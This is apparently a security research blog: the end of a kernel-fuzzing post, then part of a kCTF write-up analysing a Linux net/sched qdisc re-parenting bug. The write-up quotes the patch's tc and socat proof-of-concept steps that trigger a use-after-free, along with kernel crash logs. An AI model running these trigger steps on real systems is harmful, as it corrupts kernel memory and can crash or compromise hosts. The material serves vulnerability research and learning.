I think all in all I created ~30 seeds this way. I seeded each target protocol with at least 1 seed besides NETLINK_CRYPTO. The vast majority of the seeds became single message inputs and were simple in nature. For nf_tables specifically, I did create one input that was a series of messages to do stateful things like: create a table, then create a set, then create an object, etc.

When fuzzing with seeds, our coverage increased dramatically. The seeds alone found over 17k edges. The lesson learned is nothing new, but having good seeds dramatically enhances your fuzzing efficiency.

Mutator Tweaks

Since we’re so limited on throughput, I really wanted to make sure the inputs we were creating weren’t wasting cycles. On average we were spending over 98% of our CPU time executing the target and spending roughly 2% of the time doing snapshot resets. At that much target time, it’s clear where the bottleneck is and it’s not on anything the fuzzer itself is doing.

This kind of frees up to do more things in the fuzzer since it won’t slow the process down at all really. So what I decided to do was start hashing every input that the mutator created and comparing it to a database of the last n inputs, which I set arbitrarily at 500_000. So now, every input we create is guaranteed to not be a repeat of the last 500k inputs. This helps a little when it comes to throughput because we’re not wasting precious CPU time re-running an often seen input.

I also made sure that when the mutator was choosing mutation strategies that it would no longer accept a NOP operation in place of an applied mutation. As an example, say we get an input from the corpus to mutate and that input is already the maximum size. Previously, if we were to randomly select the ByteInsert mutation method for this input it would effectively perform a NOP and return without doing anything. This is potentially a waste of input creation cycles. So I changed the function signature of the mutation strategies to return a bool where true meant the mutation was successfully applied and false meant that it was not. This way we can make sure at least some mutation is applied to each and every input.

Lastly, I keep a constant defined in the netlink mutator that is supposed to represent the percentage of inputs that we generate from scratch. It had previously been set at 5% and I lowered it to 1% now that we have seeds. I figured this would stop us from sending so much garbage while still allowing us to do something very random that still reaches some never before reached error handling paths. In addition to the rate change, I also refactored the random generation function to produce Netlink message-like inputs instead of random blobs of data of varying lengths. Now when we generate messages from scratch, they are at least shaped like valid Netlink messages.

Hitcount Change

Some of the previous runs had absolutely exploded the corpus size, for instance in Stage 2 we had accumulated over 300k inputs in the corpus. I wanted to try and cut down on this bloat where possible because my intuition was that we were saving too many inputs. By default, Lucid would save an input if it discovered what it considered a new edge pair, eg a new basic block transition and it would save an input if it reached an edge pair a record number of times, called a hitcount. I bucket the hitcounts like AFL++ does:

/// After a fuzzing iteration, Bochs will have updated the curr_map with
    /// hit counts for each edge pair that was reached during that fuzzing
    /// iteration. Instead of keeping the hit counts literal, we instead "bucket"
    /// the hit counts into categories. So for instance if we hit an edge pair
    /// 19 times, it will be placed in the 32 hitcount bucket. This algorithm
    /// is stolen directly from AFL++ who obviously has a ton of empirical
    /// evidence showing that this is beneficial
    #[inline(always)]
    fn bucket(hitcount: u8) -> u8 {
        match hitcount {
            0 => 0,
            1 => 1,
            2 => 2,
            3 => 4,
            4..=7 => 8,
            8..=15 => 16,
            16..=31 => 32,
            32..=127 => 64,
            128..=255 => 128,
        }
    }

So, if we move from a hitcount record on an edge pair of 4 and an input achieves a hitcount of 5, we don’t save it. But if the second input were to achieve a hitcount of 8, placing it in a new bucket, it would get saved. The ratio of these hitcount record setting inputs to edge pair discovery inputs was easily more than 10 to 1 and I felt like, especially early in the campaign, they were kind of just noise and not extremely helpful.

What I moved to was a model where I only considered new hitcount records if we were “starved” for new coverage. I created the command line option to set a “starved” for coverage threshold in wall-clock time, so once you reach that, the fuzzer starts saving hitcount record inputs to the corpus. During our longest fuzzing iteration, we reached the starved state of an hour multiple times and it seemed beneficial to the fuzzing campaign at that point to save these types of inputs as they soon after found new coverage.

Corpus Sampling

In another effort to avoid corpus bloat, I moved from a model where every fuzzer gets every other fuzzer’s entire corpus every sync-interval (tunable at runtime via command line), to a model where every fuzzer would instead randomly sample inputs from other fuzzers for the entirety of the sync-interval before it would put them all back on disk and randomly pick more to sample. For my longest campaign I set this sync interval to 1 hour.

Corpus Biasing

Lastly, I decided to play with how the corpus would provide inputs to the mutator. I implemented a couple of methods: get_input_uniform and get_input_bias_new. The former would just randomly select an input from the corpus with uniform distribution (including the sampled inputs) and the latter would bias the newer inputs in the corpus by a tunable rate. For my longest campaign I made it to where around 67% of the time, we’d pick a new input. Sampled inputs from other fuzzers were considered “new” as well in this due to the way I implemented the sampling. I have to say, I don’t think this made a bit of difference in our progress. I think in a long enough time horizon it probably doesnt matter much.

We ended up setting a substantial edge-finding record in just 15h of wall-clock time and under 2 million iterations.

[lucid stats (start time: 2025-09-25 21:22:08)]
globals: uptime: 0d 15h 47m 18s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 1.923M | iters/s: 27.05 | iters/s/f: 3.38
cpu: target: 97.7% | reset: 2.2% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 25866 | last find: 0h 4m 5s | map: 39.47%
snapshot: dirty pages: 9536 | dirty / total: 0.00169% | reset memcpys: 1475
corpus: inputs: 15689 | corpus size (MB): 44.976 | max input: 0x10088

So with all of the improvements over time we were able to go from 17k edges in 90 million iterations to 26k edges in 2 million iterations. I think the biggest positive change was probably just using seeds. I don’t think much of the core fuzzer tweaking (reducing corpus bloat, sampling inputs, avoiding hitcount inputs) made too much of a difference.

Conclusions

In General

New snapshot method worked well and continued to be performant deep into campaign with thousands of dirty pages to reset
Bochs emulation is the main bottleneck in the fuzzer, you probably need quite a bit of hardware to reach coverage saturation for complex targets
Redqueen provided some huge boosts in edge discovery, but it needs a longer campaign to be beneficial
Corpus bloat reduction didn’t massively affect the fuzzer, at least on our 4 day campaign, it seems benign enough to keep
Biasing towards newer inputs didn’t seem to help the fuzzer find edges more efficiently
Re-architecting mutators to be plug and play was as huge improvement, now creating a fuzzer is as easy as implementing a custom Mutator
High-quality seeds are the easiest way to massively boost efficiency

Per Stage

Stage 1: High iteration count (88M) but only 16,917 edges - inefficient due to malformed, easily rejected inputs
Stage 2: Dramatic efficiency gain - 17,740 edges in only 2.8M iterations (~35x more efficient)
Stage 3: Broken Redqueen severely hurt performance - only 370K iterations in 14 hours
Stage 4: Fixed Redqueen restored throughput, rare but massive edge discovery gains
Stage 5: Seeds + optimizations achieved best results - 25,866 edges in 1.9M iterations

Caveats

Fuzzing is extremely random, none of these results should be taken at face value besides massive 2-10x improvements
Fuzzing is highly target dependent. Biasing towards new inputs, our corpus sampling interval, ignoring hit-counts, and reducing corpus bloat didn’t seem to have a massive negative effect with this specific target, but may be massively beneficial or harmful against others
Ideally I would’ve created line graphs documenting coverage for each stage, but I didn’t have the presence of mind to do that, I apologize

What’s Next?

Now with the first fuzzing journey out of the way and some of the core features improved/fixed, we can move onto more earnest bug hunting. Next blog series we will pick a single target (instead of 4 like in this episode) and iterate on a purpose-built mutator again hoping to find bugs. We will do all of the things you do when you’re fuzzing for bugs: create good seeds, visualize coverage, find roadblocks, iterate on mutator, scale the fuzzing workload to many cores, etc.

Repo-wise I hope to clean up my local version this weekend and then find a way to standardize the build process of the entire thing, maybe we’ll Dockerize it I’m not sure yet.

Patch-Gapping the Google Container-Optimized OS for $0

2025-02-13T00:00:00+00:00

Background

I’m trying to really focus this year on developing technically in a few ways. Part of that is reviewing kCTF entries. This helps me get a sense of what subsystems are producing the most bugs at the moment in the program and also keeps me up to date on buggy patterns to look for. Also I get to shamelessly steal players’ exploitation techniques as well. A lot of recent bugs have come from /net/sched so I was looking at patches for the subsystem and found a patch that claimed an exploitable UAF was possible. That patch is here. I didn’t realize at the time, but “Lion Ackermann” mentioned in the patch as the bug discoverer (and presumably exploiter) is a kCTF player.

I checked and discovered that at the time I found the patch the COS 105 instance in kCTF was still vulnerable to this bug. I stopped looking then, but lesson learned, the LTS instance was also still vulnerable. I don’t know exactly how the rules work, but this bug was exploited as a 0day entry as per the public kCTF responses spreadsheet in December, but at the time I started working on it, there were no patch links in the spreadsheet for this bug and the instances remained unpatched.

At this point I started trying to figure out the bug and possibly exploit it. My goal was to patch-gap the COS 105 instance with a 1day entry. Shortly after I began investigating the bug, a new release was announced, but luckily the new instances would be vulnerable as well as they had also not been patched. Since the COS 105 slot was unexploited, and the upcoming COS 105 instance would also be vulnerable, I mistakenly took this as a signal to not rush as the instance would probably remain unexploited while I worked on the project slowly. In hindsight, I should’ve worked harder on this as the COS 105 instance was exploited a few hours before I finished. It may be moot anyways since the bug was exploited previously in the program as a 0day, still not sure about that. Anyways, I encountered some self-inflicted roadblocks that really hindered my progress, we’ll get into those. Next time I’ll work harder and dedicate more time to the effort instead of just a few hours here and there at night.

Patch Analysis

The patch text is very descriptive and provides a nice proof-of-concept to reproduce the buggy condition:

net: sched: Disallow replacing of child qdisc from one parent to another
Lion Ackermann was able to create a UAF which can be abused for privilege
escalation with the following script

Step 1. create root qdisc
tc qdisc add dev lo root handle 1:0 drr

step2. a class for packet aggregation do demonstrate uaf
tc class add dev lo classid 1:1 drr

step3. a class for nesting
tc class add dev lo classid 1:2 drr

step4. a class to graft qdisc to
tc class add dev lo classid 1:3 drr

step5.
tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

step6.
tc qdisc add dev lo parent 1:2 handle 3:0 drr

step7.
tc class add dev lo classid 3:1 drr

step 8.
tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

step 9. Display the class/qdisc layout

tc class ls dev lo
 class drr 1:1 root leaf 2: quantum 64Kb
 class drr 1:2 root leaf 3: quantum 64Kb
 class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
 qdisc drr 1: dev lo root refcnt 2
 qdisc plug 2: dev lo parent 1:1
 qdisc pfifo 4: dev lo parent 3:1 limit 1000p
 qdisc drr 3: dev lo parent 1:2

step10. trigger the bug <=== prevented by this patch
tc qdisc replace dev lo parent 1:3 handle 4:0

step 11. Redisplay again the qdiscs/classes

tc class ls dev lo
 class drr 1:1 root leaf 2: quantum 64Kb
 class drr 1:2 root leaf 3: quantum 64Kb
 class drr 1:3 root leaf 4: quantum 64Kb
 class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls
 qdisc drr 1: dev lo root refcnt 2
 qdisc plug 2: dev lo parent 1:1
 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p
 qdisc drr 3: dev lo parent 1:2

Observe that a) parent for 4:0 does not change despite the replace request.
There can only be one parent.  b) refcount has gone up by two for 4:0 and
c) both class 1:3 and 3:1 are pointing to it.

Step 12.  send one packet to plug
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))
step13.  send one packet to the grafted fifo
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))

step14. lets trigger the uaf
tc class delete dev lo classid 1:3
tc class delete dev lo classid 1:1

The semantics of "replace" is for a del/add _on the same node_ and not
a delete from one node(3:1) and add to another node (1:3) as in step10.
While we could "fix" with a more complex approach there could be
consequences to expectations so the patch takes the preventive approach of
"disallow such config".

The bug here is that a qdisc can be “re-parented” to a class that is not its original parent. This kind of logic was not intended. When you create these types of classes that can have qdiscs attached, a default qdisc is allocated and you can graft a new qdisc to the class afterwards to replace the current qdisc. So you can see that class 1:3 is first created and then we graft a qdisc onto it in step 8. This will free the default qdisc and instantiate this one in its place and attach it to the class.

The bug however, lets you graft that qdisc (handle 4:0) onto a different class by using the same grafting mechanism that we used on 3:1 but now we’re grafting the same qdisc onto two classes. The patch points out the side effects of this bug are basically this:

From qdisc 4:0’s point of view, it’s parent is still class 3:1, that is never changed
From class 3:1’s perspective, qdisc 4:0 is still its child qdisc
From class 1:3’s perspective, qdisc 4:0 is now its child qdisc
The refcount on the qdisc is now 2: 1 from the initial graft onto 3:1 and another 1 from the re-parent graft onto 1:3

So those are the side effects the bug produces. At this point, I didn’t know a single thing about /net/sched, classes, qdiscs, etc, so the learning curve during this process was steep. I had never dealt with this subsystem before in my life. But after a lot of Googling and ChatGPTing, I was able to reproduce the PoC in the patch with the tc utility just as the patch specifies. I went through all the steps and when I got to step 14 and it was time to trigger the UAF, I got the following splat after deleting class 1:3:

[   10.519000] ------------[ cut here ]------------
[   10.521778] list_del corruption, ffff8fdd50a008d0->next is NULL
[   10.525296] WARNING: CPU: 0 PID: 784 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[   10.530218] Modules linked in:
[   10.532091] CPU: 0 PID: 784 Comm: tc.bin Not tainted 5.15.173+ #1
[   10.535676] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[   10.540545] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[   10.543555] Code: 48 8b 00 48 39 f8 75 67 48 8b 52 08 48 39 c2 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 80 71 cf a7 e8 e3a
[   10.554231] RSP: 0018:ffffa1020168b940 EFLAGS: 00010282
[   10.557286] RAX: 0000000000000000 RBX: ffff8fdd50a00880 RCX: 0000000000000000
[   10.561417] RDX: 0000000000000000 RSI: ffffa1020168b770 RDI: 00000000ffffffea
[   10.565575] RBP: 0000000000010003 R08: 00000000ffffdfff R09: 0000000000000001
[   10.570036] R10: 00000000ffffdfff R11: ffffffffa8669da0 R12: 0000000000000001
[   10.574238] R13: ffff8fdd44f8e000 R14: ffffffffa7ad11e0 R15: 0000000000010000
[   10.578407] FS:  000000001a406880(0000) GS:ffff8fdd5c400000(0000) knlGS:0000000000000000
[   10.583118] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   10.586532] CR2: 00000000005a6cc0 CR3: 0000000110d5a003 CR4: 0000000000370ef0
[   10.590718] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   10.594898] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   10.599087] Call Trace:
[   10.600704]  
[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
[   10.628214]  ? exc_page_fault+0x76/0x140
[   10.630556]  rtnetlink_rcv_msg+0x21e/0x350
[   10.633230]  ? security_sock_rcv_skb+0x31/0x50
[   10.635869]  ? rtnl_calcit.isra.0+0x130/0x130
[   10.638517]  netlink_rcv_skb+0x4e/0x100
[   10.640868]  netlink_unicast+0x231/0x370
[   10.643209]  netlink_sendmsg+0x250/0x4b0
[   10.645546]  __sock_sendmsg+0x5c/0x70
[   10.647746]  ____sys_sendmsg+0x25a/0x2a0
[   10.650116]  ? import_iovec+0x17/0x20
[   10.652338]  ___sys_sendmsg+0x96/0xd0
[   10.654575]  __sys_sendmsg+0x76/0xc0
[   10.656746]  do_syscall_64+0x3d/0x90
[   10.658970]  entry_SYSCALL_64_after_hwframe+0x6c/0xd6
[   10.662043] RIP: 0033:0x4e7697
[   10.663880] Code: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 2e 00 000
[   10.674696] RSP: 002b:00007ffc56673e38 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   10.679091] RAX: ffffffffffffffda RBX: 0000000067ae1e0c RCX: 00000000004e7697
[   10.683247] RDX: 0000000000000000 RSI: 00007ffc56673ea0 RDI: 0000000000000043
[   10.687411] RBP: 00007ffc56674fb0 R08: 00000000005978a0 R09: 000000001a4102b0
[   10.691609] R10: 000000001a4082a0 R11: 0000000000000246 R12: 0000000000578448
[   10.695807] R13: 000000000054449b R14: 00000000005af620 R15: 0000000000000001
[   10.699977]  
[   10.701360] ---[ end trace 8e001f66f1703586 ]---

At this point I was excited because I thought I had recreated the bug and caused a UAF and I’d soon be looking for ways to exploit the bug; however I was extremely wrong. All this splat is is a warning that there was an invalid list_del operation. In my development environment, this was enough to cause a kernel panic. I had KASAN enabled so if there was a UAF I would’ve seen a different splat, so now I’m very confused. On further inspection, I never even reached the step where I delete class 1:1 as in the PoC, so what is going on? Why does my PoC stop here on this list_del operation? Time to dig into the details.

First, why do even encounter a bad list_del operation? We still don’t know much about this bug or subsystem yet. I had basically just recreated the PoC in the patch and had done almost zero critical thinking of my own. After a lot of printk debugging, I finally figured out where the invalid list_del comes from.

List Bug Analysis

First of all, why is list_del complaining? Well it turns out that a common kernel configuration is CONFIG_DEBUG_LIST, which turns the list manipulation APIs, like list_del into more careful versions of themselves. list_del’s job is to remove a list_head node out of a linked list. If you can visualize a linked list in the kernel, it’s essentially a list of nodes. Each node contains a prev and a next pointer that reference the previous and the next node in the list respectively. So the debug list configuration has some sanity checks that make sure that when you go to remove a node from a list, there hasn’t been any corruption of the node itself. When we delete class 1:3, something happens during that process and we end up here:

static inline void __list_del_entry(struct list_head *entry)
{
	if (!__list_del_entry_valid(entry))
		return;

	__list_del(entry->prev, entry->next);
}

Things are going awry in the __list_del_entry_valid check it seems:

/*
 * Performs list corruption checks before __list_del_entry(). Returns false if a
 * corruption is detected, true otherwise.
 *
 * With CONFIG_LIST_HARDENED only, performs minimal list integrity checking
 * inline to catch non-faulting corruptions, and only if a corruption is
 * detected calls the reporting function __list_del_entry_valid_or_report().
 */
static __always_inline bool __list_del_entry_valid(struct list_head *entry)
{
	bool ret = true;

	if (!IS_ENABLED(CONFIG_DEBUG_LIST)) {
		struct list_head *prev = entry->prev;
		struct list_head *next = entry->next;

		/*
		 * With the hardening version, elide checking if next and prev
		 * are NULL, LIST_POISON1 or LIST_POISON2, since the immediate
		 * dereference of them below would result in a fault.
		 */
		if (likely(prev->next == entry && next->prev == entry))
			return true;
		ret = false;
	}

	ret &= __list_del_entry_valid_or_report(entry);
	return ret;
}

Which in turn calls __list_del_entry_valid_or_report because we do indeed have CONFIG_DEBUG_LIST enabled:

bool __list_del_entry_valid_or_report(struct list_head *entry)
{
	struct list_head *prev, *next;

	prev = entry->prev;
	next = entry->next;

	if (CHECK_DATA_CORRUPTION(next == NULL,
			"list_del corruption, %px->next is NULL\n", entry) ||
	    CHECK_DATA_CORRUPTION(prev == NULL,
			"list_del corruption, %px->prev is NULL\n", entry) ||
	    CHECK_DATA_CORRUPTION(next == LIST_POISON1,
			"list_del corruption, %px->next is LIST_POISON1 (%px)\n",
			entry, LIST_POISON1) ||
	    CHECK_DATA_CORRUPTION(prev == LIST_POISON2,
			"list_del corruption, %px->prev is LIST_POISON2 (%px)\n",
			entry, LIST_POISON2) ||
	    CHECK_DATA_CORRUPTION(prev->next != entry,
			"list_del corruption. prev->next should be %px, but was %px. (prev=%px)\n",
			entry, prev->next, prev) ||
	    CHECK_DATA_CORRUPTION(next->prev != entry,
			"list_del corruption. next->prev should be %px, but was %px. (next=%px)\n",
			entry, next->prev, next))
		return false;

	return true;
}

So what’s going on? We don’t know much about the /net/sched code yet, but it appears that because we have CONFIG_DEBUG_LIST, there is a check on the node you want to remove from the list. If you had the following linked list:

A -> B -> C -> D -> A

Each node in the list would point to its neighbors, for instance, for node D it would have the node C in its prev field and it would have node A in its next field because the list is circular. The validity check here makes sure that if you want to delete node D for instance, that the node C says it’s next node is D and that node A says its previous node is D. Makes sense. But in our list_del WARN() banner we see that this function returns false because list_del corruption, ffff8fdd50a008d0->next is NULL. So we can’t even check the neighboring nodes for sanity because our node D doesn’t even have a next field value, it’s NULL.

Ok so we fail this list_del and the PoC just dies here because when we delete class 1:3 the list_head that we submit for deletion at some point in the /net/sched is either corrupted or it was never initialized. So let’s now figure out what is going on in /net/sched when this bug occurs to see if we can figure out what is happening.

Sched Bug Analysis

Taking a deeper dive into the /net/sched code it became clear why the node that we were deleting was in a buggy state. In the PoC we create a class 1:1 and assign it a qdisc of type plug. A plug qdisc is meant to literally stop packets from being dequeued until its given an explicit release command or deleted, it plugs up the qdisc with packets as they are “enqueued”. So if we send a packet to class 1:1, that packet will be enqueued in 1:1’s qdisc that is a plug type, meaning those packets will sit there until we explicitly ask for them. So at this point, it’s clear that for some reason, making sure packets are held in the plug qdisc is crucial to the PoC. But what about our buggy list_head node? It’s clear that after we send a packet to class 1:1 and the plug qdisc, we send a packet to 1:3. Class 1:3 is the class that we grafted the already existing pfifo qdisc onto from 3:1 when we exercised the re-parenting bug. Let’s take a look at what happens when we send a packet to a class, namely class 1:3:

static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch,
		       struct sk_buff **to_free)
{
	unsigned int len = qdisc_pkt_len(skb);
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	int err = 0;
	bool first;

	cl = drr_classify(skb, sch, &err);		// [1]
	if (cl == NULL) {
		if (err & __NET_XMIT_BYPASS)
			qdisc_qstats_drop(sch);
		__qdisc_drop(skb, to_free);
		return err;
	}

	first = !cl->qdisc->q.qlen;			// [2]
	err = qdisc_enqueue(skb, cl->qdisc, to_free);	// [3]
	if (unlikely(err != NET_XMIT_SUCCESS)) {
		if (net_xmit_drop_count(err)) {
			cl->qstats.drops++;
			qdisc_qstats_drop(sch);
		}
		return err;
	}

	if (first) {
		list_add_tail(&cl->alist, &q->active);	// [4]
		cl->deficit = cl->quantum;
	}

	sch->qstats.backlog += len;
	sch->q.qlen++;
	return err;
}

There’s a few important things going in here. I’ve not yet mentioned the drr aspect of this which stands for “Deficit Round Robin” which is the type of algorithm used to determine how packet delivery is scheduled in this PoC. The details of the DRR algorithm are not super important, but from what I have learned at a high level it basically keeps track of what classes are currently “active”, ie, have packets enqueued to them, and tries to deliver the packets based on “deficits” that are configurable. So this way we make sure that packets are distributed in a way that makes sense to us as an end-user trying to shape traffic or guarantee some quality of service. This function is invoked when the qdisc we set up in step 1 has been enqueued with a packet (at the interface level, we use loopback):

[1]: In this step we have a packet, and we attempt to classify the packet into one of the existing drr classes that belong in the root qdisc hierarchy with the drr_classify function
[2]: If we find a class that matches for the packet, ie the priority matches a class we have setup like 1:3, we check class 1:3’s qdisc and see if it has been enqueued with any packets, if it has not, the first flag is set to true
[3]: Class 1:3’s qdisc is enqueued with a packet
[4]: If this was the class’s first packet, this packet needs to be placed on the drr scheduler’s active list which contains list_head structs for every drr class that has packets enqueued so that the scheduler can apply the algorithm and make sure packets are dequeued appropriately

Everything in here makes sense and after printing out the class and qdisc pointer values and lining them up with allocations from the PoC when we set up the hierarchy, nothing seemed amiss here. Let’s look at the backtrace from when the list_del WARN() occurs to see what function that occurred in:

[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0

So we land in drr_qlen_notify from a call to drr_delete_class:

static int drr_delete_class(struct Qdisc *sch, unsigned long arg,
			    struct netlink_ext_ack *extack)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl = (struct drr_class *)arg;

	if (cl->filter_cnt > 0)
		return -EBUSY;

	sch_tree_lock(sch);

	qdisc_purge_queue(cl->qdisc);				// [1]
	qdisc_class_hash_remove(&q->clhash, &cl->common);	// [2]

	sch_tree_unlock(sch);

	drr_destroy_class(sch, cl);
	return 0;
}

[1]: In this step we purge the class’s qdisc, which in our case would be our buggy qdisc that we re-parented to 1:3 from 3:1
[2]: Remove this class’s hash from the scheduler’s class hash table so that it cannot be looked up again

The source doesn’t quite match with the back trace, probably because of inlining, but we end up in drr_qlen_notify from qdisc_purge_queue calling qdisc_tree_reduce_backlog as part of the qdisc cleaning up process. This is where our buggy state reveals itself

void qdisc_tree_reduce_backlog(struct Qdisc *sch, int n, int len)
{
	bool qdisc_is_offloaded = sch->flags & TCQ_F_OFFLOADED;
	const struct Qdisc_class_ops *cops;
	unsigned long cl;
	u32 parentid;
	bool notify;
	int drops;

	if (n == 0 && len == 0)
		return;
	drops = max_t(int, n, 0);
	rcu_read_lock();
	while ((parentid = sch->parent)) {				// [1]
		if (parentid == TC_H_ROOT)
			break;

		if (sch->flags & TCQ_F_NOPARENT)
			break;
		/* Notify parent qdisc only if child qdisc becomes empty.
		 *
		 * If child was empty even before update then backlog
		 * counter is screwed and we skip notification because
		 * parent class is already passive.
		 *
		 * If the original child was offloaded then it is allowed
		 * to be seem as empty, so the parent is notified anyway.
		 */
		notify = !sch->q.qlen && !WARN_ON_ONCE(!n &&
						       !qdisc_is_offloaded);
		/* TODO: perform the search on a per txq basis */
		sch = qdisc_lookup(qdisc_dev(sch), TC_H_MAJ(parentid)); 
		if (sch == NULL) {
			WARN_ON_ONCE(parentid != TC_H_ROOT);
			break;
		}
		cops = sch->ops->cl_ops;				// [2]
		if (notify && cops->qlen_notify) {
			cl = cops->find(sch, parentid);			// [3]
			cops->qlen_notify(sch, cl);			// [4]
		}
		sch->q.qlen -= n;
		sch->qstats.backlog -= len;
		__qdisc_qstats_drop(sch, drops);
	}
	rcu_read_unlock();
}

[1]: We use the parentid that is derived from the qdisc. This is where the problem is, remember that one of the effects of the bug was that the qdisc itself doesn’t know that it was reparented to 1:3, its parentid is still going to reference class 3:1
[2]: Grab a reference to the function table for the qdisc’s class’s ops member so that we do a class appropriate search, ie drr
[3]: Use the class ops to execute the find function drr_search_class
[4]: We set cl to class 3:1 because according to the buggy qdisc, that is its class parent still
[5]: We call the class ops qlen_notify function, which for drr is drr_qlen_notify

static void drr_qlen_notify(struct Qdisc *csh, unsigned long arg)
{
	struct drr_class *cl = (struct drr_class *)arg;

	list_del(&cl->alist);
}

And here is the problem! We call list_del on class 3:1’s alist member which is an uninitialized list_head. Its list_head is uninitialized (NULL) because it was never placed on the drr scheduler’s active list because when we enqueued packets into class 1:3, it was class 1:3’s alist that was initialized and inserted into the scheduler’s active class list. This explains why we get the splat.

That’s one mystery solved, but why does our PoC stop at deleting class 1:3 on a list_del bug and the patch mentions UAF and includes deleting class 1:1?

Shooting Myself in the Foot

At this point I was happy to have discovered why we were encountering the list bug, but still didn’t see how this bug was exploitable or could lead to UAF. I started to suspect that the PoC in the patch was just to prove there was in fact an issue and not directly expose a UAF exactly. This was a horrible assumption that led me very astray. For probably two days worth of effort, I read all of the code over and over looking for ways that I could get a UAF on the buggy qdisc object. I don’t know why I assumed that the UAF must be on the buggy qdisc, but the fact that it appeared to belong to two separate classes weighed heavy in my mind. The issue I kept coming back to was: the qdisc’s refcount is correct, it’s 2, so how could it be the UAF object? I tried to find ways that I could free the qdisc, but still retain a reference to it via class 1:3 or class 3:1 in hopes that that would be the way to access the UAF.

After a couple of days of trying lots of different strategies and thinking about it, I realized that there was no way to free the qdisc from this buggy condition. If you delete its real parent in 3:1 you have no way grab a handle to it again, because non-root qdiscs must have a classid. So you can’t even look up the qdisc without providing a classid. If you delete 1:3, it will remove a refcount from the qdisc, but now everything is normal, it has a refcount of 1 and belongs to class 3:1.

I was very frustrated at this part and decided to start over, maybe I missed something in the patch. I fixated on the fact that in the patch they specifically say “lets trigger the UAF” and the action includes deleting 1:1. To this point, I was never able to even delete 1:1 because I get stuck panicking on the list bug. After toying with the idea of first initializing 3:1’s alist appropriately and getting it added to the active list for the scheduler to bypass the list bug, I decided to just quickly make sure there was nothing wrong with my setup. Mind you, I’ve been working in this environment for 2-3 days at this point getting familiar with the bug, reading the code, debugging, brainstorming about ways to get a UAF on the qdisc, etc.

I revisited the list code we discussed above. There were those CHECK_DATA_CORRUPTION invocations in the __list_del_entry_valid_or_report function like this:

#define CHECK_DATA_CORRUPTION(condition, addr, fmt, ...)		 \
	check_data_corruption(({					 \
		bool corruption = unlikely(condition);			 \
		if (corruption) {					 \
			if (addr)					 \
				mem_dump_obj(addr);			 \
			if (IS_ENABLED(CONFIG_BUG_ON_DATA_CORRUPTION)) { \
				pr_err(fmt, ##__VA_ARGS__);		 \
				BUG();					 \
			} else						 \
				WARN(1, fmt, ##__VA_ARGS__);		 \
		}							 \
		corruption;						 \
	}))

#endif	/* _LINUX_BUG_H */

Welp, this is a pretty important discovery. It looks like if you have CONFIG_BUG_ON_DATA_CORRUPTION enabled, you will BUG() on an invalid list del operation and if you don’t have it enabled, you will simply receive a WARN(). I check my kernel config in my development environment and sure enough I have CONFIG_BUG_ON_DATA_CORRUPTION=y. Let’s check the kCTF kernel configuration: CONFIG_BUG_ON_DATA_CORRUPTION is not set. Yikes! This whole time I was stuck on the list delete operation, days, was because I had the wrong kernel configuration. I felt awful about this but going forward I’ll obviously make my environment more kCTF like from the beginning.

Finally a UAF to Investigate

Once I had the right kernel configuration, I re-ran the PoC and behold:

[   26.091921] ==================================================================
[   26.093519] BUG: KASAN: slab-use-after-free in __list_del_entry_valid+0x7a/0x140
[   26.095252] Read of size 8 at addr ffff8880134c0558 by task tc.bin/816
[   26.096631] 
[   26.097090] CPU: 0 PID: 816 Comm: tc.bin Tainted: G        W          6.5.13 #92
[   26.098817] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[   26.100720] Call Trace:
[   26.101297]  
[   26.101771]  dump_stack_lvl+0x48/0x60
[   26.102612]  print_report+0xc2/0x600
[   26.103384]  ? __virt_addr_valid+0xc7/0x140
[   26.104294]  ? __list_del_entry_valid+0x7a/0x140
[   26.105306]  kasan_report+0xb6/0xf0
[   26.106059]  ? __list_del_entry_valid+0x7a/0x140
[   26.107056]  __list_del_entry_valid+0x7a/0x140
[   26.108001]  drr_qlen_notify+0x60/0xd0
